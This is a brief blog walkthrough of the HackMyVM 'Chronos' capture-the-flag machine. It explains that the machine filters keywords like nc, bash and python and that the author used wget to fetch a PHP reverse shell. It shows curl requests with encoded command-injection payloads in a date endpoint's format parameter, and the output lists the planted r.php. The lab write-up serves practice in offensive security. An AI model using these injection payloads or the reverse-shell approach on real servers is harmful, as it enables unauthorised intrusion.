日度归档:2021 年 8 月 10 日

HackMyVm Chronos Walkthrough

发表评论

HackMyVm Chronos Walkthrough

The author's writeup is here:https://al1enum.github.io/docs/Chronos.pdf.

Very interesting machine.

The author use perl to get reverse shell, because the machine blocked many keywords: nc, bash, python, etc.

My way is to use wget to download a php reverse shell.

~ curl 'http://chronos.local:8000/date?format=261Bh6biKcNSb82qsJG3axmPWvBhPVZUTUzqYLXr2nGfYVHfcpNVUhTU1Z95B5dJzYt151Eki' -A 'Chronos'  
 Something went wrong

 ~ curl 'http://chronos.local:8000/date?format=H8SMnBduptVPuh8JQtH81okZXHxz74' -A 'Chronos'
 Sun Aug  8 04:05:06 UTC 2021
 total 24
 drwxr-xr-x 3 www-data www-data 4096 Aug  8 04:03 .
 drwxr-xr-x 3 root     root     4096 Jul 29 08:59 ..
 drwxr-xr-x 2 www-data www-data 4096 Jul 30 08:00 css
 -rw-r--r-- 1 www-data www-data 1887 Aug  4 07:18 index.html
 -rw-r--r-- 1 www-data www-data 5496 Aug  8 04:03 r.php